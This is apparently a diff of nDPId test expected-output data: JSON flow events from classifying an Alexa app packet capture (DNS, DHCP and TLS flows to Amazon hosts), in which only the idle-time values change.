00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":114,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976115835,"flow_last_seen":1490976115901,"flow_idle_time":180000,"flow_min_l4_payload_len":57,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":130,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":28614,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} -00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":24,"flow_first_seen":1490976076042,"flow_last_seen":1490976177233,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3494,"flow_avg_l4_payload_len":145,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":37113,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":159,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1490976196942,"flow_last_seen":1490976198168,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":11051,"flow_avg_l4_payload_len":460,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.121","src_port":47605,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} -00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":160,"flow_state":"finished","flow_packets_processed":28,"flow_first_seen":1490976197297,"flow_last_seen":1490976198043,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":9036,"flow_avg_l4_payload_len":322,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.121","src_port":47606,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} -01048{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":73,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1490976071392,"flow_last_seen":1490976176431,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":5656,"flow_avg_l4_payload_len":245,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":59698,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} +00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":24,"flow_first_seen":1490976076042,"flow_last_seen":1490976177233,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3494,"flow_avg_l4_payload_len":145,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":37113,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":159,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1490976196942,"flow_last_seen":1490976198168,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":11051,"flow_avg_l4_payload_len":460,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.121","src_port":47605,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} +00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":160,"flow_state":"finished","flow_packets_processed":28,"flow_first_seen":1490976197297,"flow_last_seen":1490976198043,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":9036,"flow_avg_l4_payload_len":322,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.121","src_port":47606,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} +01048{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":73,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1490976071392,"flow_last_seen":1490976176431,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":5656,"flow_avg_l4_payload_len":245,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":59698,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} 00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976031581,"flow_last_seen":1490976031687,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":107,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":41030,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"}} 00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1490976023267,"flow_last_seen":1490976023267,"flow_idle_time":180000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.1","dst_ip":"172.16.42.216","src_port":67,"dst_port":68,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}} 00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":103,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976107217,"flow_last_seen":1490976107359,"flow_idle_time":180000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":57,"flow_tot_l4_payload_len":98,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":14476,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"}} -00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":153,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1490976195983,"flow_last_seen":1490976196942,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":13938,"flow_avg_l4_payload_len":464,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.62.115","src_port":41912,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} -00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":154,"flow_state":"finished","flow_packets_processed":350,"flow_first_seen":1490976195984,"flow_last_seen":1490976198040,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":248700,"flow_avg_l4_payload_len":710,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.62.115","src_port":41913,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} -00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":155,"flow_state":"finished","flow_packets_processed":35,"flow_first_seen":1490976195985,"flow_last_seen":1490976196943,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":15782,"flow_avg_l4_payload_len":450,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.62.115","src_port":41914,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} +00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":153,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1490976195983,"flow_last_seen":1490976196942,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":13938,"flow_avg_l4_payload_len":464,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.62.115","src_port":41912,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} +00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":154,"flow_state":"finished","flow_packets_processed":350,"flow_first_seen":1490976195984,"flow_last_seen":1490976198040,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":248700,"flow_avg_l4_payload_len":710,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.62.115","src_port":41913,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} +00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":155,"flow_state":"finished","flow_packets_processed":35,"flow_first_seen":1490976195985,"flow_last_seen":1490976196943,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":15782,"flow_avg_l4_payload_len":450,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.62.115","src_port":41914,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} 00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":138,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976177026,"flow_last_seen":1490976177105,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":4312,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"}} 00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976027724,"flow_last_seen":1490976027725,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":10462,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"}} 00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976024847,"flow_last_seen":1490976024848,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":110,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":55619,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"ConnCheck"}} 00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976043611,"flow_last_seen":1490976043811,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":86,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":43350,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"}} -00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":149,"flow_state":"finished","flow_packets_processed":65,"flow_first_seen":1490976195529,"flow_last_seen":1490976198776,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":34748,"flow_avg_l4_payload_len":534,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.143","src_port":41828,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} -00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":56,"flow_first_seen":1490976085644,"flow_last_seen":1490976098828,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":21353,"flow_avg_l4_payload_len":381,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45703,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":23,"flow_first_seen":1490976085829,"flow_last_seen":1490976088478,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4344,"flow_avg_l4_payload_len":188,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45704,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":19,"flow_first_seen":1490976085832,"flow_last_seen":1490976088478,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2595,"flow_avg_l4_payload_len":136,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45705,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976085884,"flow_last_seen":1490976088478,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45707,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} -00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976085884,"flow_last_seen":1490976088478,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45707,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00591{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1490976088605,"flow_last_seen":1490976094930,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":698,"flow_tot_l4_payload_len":1938,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45709,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":49,"flow_first_seen":1490976088631,"flow_last_seen":1490976098828,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":18884,"flow_avg_l4_payload_len":385,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45710,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":33,"flow_first_seen":1490976088937,"flow_last_seen":1490976110046,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":12258,"flow_avg_l4_payload_len":371,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45711,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":42,"flow_first_seen":1490976088958,"flow_last_seen":1490976094931,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":12771,"flow_avg_l4_payload_len":304,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45712,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":27,"flow_first_seen":1490976089227,"flow_last_seen":1490976107676,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":8016,"flow_avg_l4_payload_len":296,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45714,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":29,"flow_first_seen":1490976089239,"flow_last_seen":1490976111839,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":10466,"flow_avg_l4_payload_len":360,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45715,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1490976114885,"flow_last_seen":1490976117017,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4039,"flow_avg_l4_payload_len":201,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45728,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":19,"flow_first_seen":1490976114894,"flow_last_seen":1490976116921,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2723,"flow_avg_l4_payload_len":143,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45729,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1490976114906,"flow_last_seen":1490976117017,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4615,"flow_avg_l4_payload_len":230,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45730,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":19,"flow_first_seen":1490976114921,"flow_last_seen":1490976117016,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2611,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45731,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":21,"flow_first_seen":1490976114940,"flow_last_seen":1490976120960,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":5531,"flow_avg_l4_payload_len":263,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45732,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00830{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1490976030894,"flow_last_seen":1490976194743,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":13865,"flow_avg_l4_payload_len":478,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.22.185","src_port":53682,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} -00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":133,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1490976150029,"flow_last_seen":1490976164211,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":698,"flow_tot_l4_payload_len":2962,"flow_avg_l4_payload_len":148,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45750,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":134,"flow_state":"info","flow_packets_processed":21,"flow_first_seen":1490976158680,"flow_last_seen":1490976164214,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2813,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45751,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 